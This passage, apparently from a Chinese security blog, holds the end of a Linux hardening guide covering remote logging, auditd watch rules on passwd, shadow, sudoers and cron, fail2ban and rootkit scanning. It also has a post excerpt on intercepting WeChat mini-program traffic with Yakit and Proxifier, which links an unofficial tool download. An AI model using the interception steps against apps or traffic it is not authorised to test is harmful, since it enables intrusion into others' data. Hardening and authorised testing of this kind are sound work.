开启地址空间布局随机化,抵御缓冲区溢出攻击 kernel.randomize_va_space = 2 # 3、使内核参数配置生效 sysctl -p 六、日志审计与入侵防御体系建设6.1 日志全量审计与远程同步本地日志可被黑客删除篡改,必须配置日志远程同步,将所有系统日志、认证日志、业务日志实时同步到不可篡改的远程日志平台,这是溯源攻击行为的核心根基。# 1、配置rsyslog日志远程同步,将日志发送到远程日志服务器 vi /etc/rsyslog.conf # 新增配置,将所有日志通过TCP协议发送到远程日志服务器192.168.1.200的514端口 *.* @@192.168.1.200:514 # 2、重启rsyslog服务生效 systemctl restart rsyslog # 3、配置日志轮转,防止日志占满磁盘空间 vi /etc/logrotate.conf # 核心配置: rotate 30 # 保留30天的日志 daily # 每天轮转一次 compress # 压缩历史日志 missingok # 日志文件不存在不报错 notifempty # 空日志不轮转 6.2 系统操作行为全量审计通过 auditd 审计服务,监控所有敏感操作,包括账号修改、文件篡改、命令执行、权限变更,所有操作都会被记录,即使黑客清理了 Shell 历史,也无法删除审计日志。# 1、安装auditd审计服务 # CentOS/RHEL:yum install -y audit # Ubuntu/Debian:apt install -y auditd audispd-plugins # 2、启动服务并设置开机自启 systemctl start auditd systemctl enable auditd # 3、配置审计规则,监控核心敏感操作 vi /etc/audit/rules.d/audit.rules # 新增核心审计规则: # 监控账号配置文件修改 -w /etc/passwd -p wa -k passwd_modify -w /etc/shadow -p wa -k shadow_modify -w /etc/group -p wa -k group_modify # 监控认证配置修改 -w /etc/ssh/sshd_config -p wa -k sshd_modify -w /etc/sudoers -p wa -k sudo_modify # 监控定时任务修改 -w /etc/crontab -p wa -k cron_modify -w /etc/cron.d/ -p wa -k cron_dir_modify # 监控root用户的命令执行 -a exit,always -F arch=b64 -F euid=0 -S execve -k root_exec # 监控SUID提权操作 -a always,exit -F arch=b64 -S execve -F path=/usr/bin/su -k su_exec -a always,exit -F arch=b64 -S execve -F path=/usr/bin/sudo -k sudo_exec # 4、重载审计规则生效 augenrules --load # 5、查看审计日志,排查异常操作 ausearch -k passwd_modify ausearch -k sshd_modify 6.3 入侵防御工具部署1、 部署 fail2ban,自动封禁暴力破解 IP:监控 SSH、Web 服务的登录失败日志,连续多次失败后自动封禁 IP,杜绝暴力破解攻击。2、 部署 rkhunter 与 chkrootkit,定期检测 rootkit 后门:每周执行一次全盘扫描,检测黑客植入的 rootkit、后门程序。3、 部署 ClamAV 开源杀毒软件,定期扫描恶意文件:配置定时任务,每天凌晨扫描 Web 目录、临时目录,查杀 WebShell、恶意程序。七、持续运营与应急响应安全加固不是一次性操作,而是持续的运营过程,需建立完整的基线检查、漏洞管理、应急响应机制:1、 每月执行一次系统安全基线检查,对比加固基线,发现配置偏移立即修复2、 每周执行一次系统漏洞扫描,及时安装系统与软件的安全补丁,高危漏洞需 24 小时内完成修复3、 每天审计系统日志与告警信息,发现异常登录、文件修改、端口扫描行为,立即启动应急排查4、 定期备份核心配置文件与业务数据,制定完整的应急响应预案,发生入侵事件时可快速隔离、溯源、恢复业务结尾Linux 服务器安全加固的核心,是构建 “事前预防、事中阻断、事后溯源” 的完整防护体系。没有绝对安全的系统,但通过最小权限、纵深防御、持续审计的加固思路,可最大程度提升服务器的抗入侵能力,将黑客攻击的成本提升到最高,攻击成功率降到最低。
2026年04月10日
1,010 阅读
0 评论
0 点赞
2026-03-29
2026最新ubuntu镜像地址,ubuntu镜像下载
软件源镜像地址(用于 /etc/apt/sources.list)镜像站软件源地址
2026年03月29日
1,381 阅读
0 评论
0 点赞
2025-12-16
告别burp,2026最新yakit + proxifier小程序抓包教程
在使用burp抓包的时候,最近老有问题,抓不到包,干脆直接用yakit了用完之后真香,不说那么多废话直接开始⬇⬇⬇⬇⬇本文配套工具 中文proxifier+yakit 地址 ⬇⬇⬇⬇⬇https://pan.quark.cn/s/d074defb7120⬆⬆⬆⬆⬆⬆⬆首先我们打开 proxifier,我们选择配置文件添加代理服务器,配置如下打开yakit,安装MITM证书!选择手动安装,这步是重点!双击执行选择是开始抓包选择MITM,并配置好代理切换proxifier设置代理规则选择添加(我这里已经添加好了)我们随便打开一个小程序,在任务管理器中找到这个应用下拉,随便选一个打开文件所在位置找到这个exe在proxifier的代理规则中,添加代理规则,选择浏览找到微信小程序的那个app他会出现如下内容再选择这里点击确定即可,确保你这个勾选好了这个时候yakit就能正常抓小程序包了,选择手动劫持或者自动劫持都可以,用过之后就知道什么东西了常见问题proxifier抓不到小程序包1、在配置文件中找到高级选项,再选择HTTP代理服务器打开这个选项2、在配置文件中找到名称解析取消勾选自动检测DNS,选择通过代理解析主机名称这样之后,proxifier 就能抓到小程序的包了,尽情的渗透测试吧!
2025年12月16日
1,220 阅读
0 评论
0 点赞
1
2
3
...
14